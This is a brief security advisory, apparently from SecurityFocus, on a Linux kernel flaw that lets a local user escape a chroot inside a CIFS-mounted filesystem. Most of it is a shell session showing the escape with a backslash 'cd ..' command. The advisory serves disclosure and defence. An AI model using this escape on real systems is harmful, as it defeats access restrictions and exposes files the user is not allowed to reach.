source: https://www.securityfocus.com/bid/17742/info The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data. The problem affects chroot inside of an SMB-mounted filesystem ('cifs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem. root@server me]# pwd /path/to/my/dir [root@server me]# ls bin chroot etc lib [root@server me]# chroot . bash-2.05a# pwd / bash-2.05a# ls bin chroot etc lib bash-2.05a# cd ..\bash-2.05a# pwd /..bash-2.05a# ls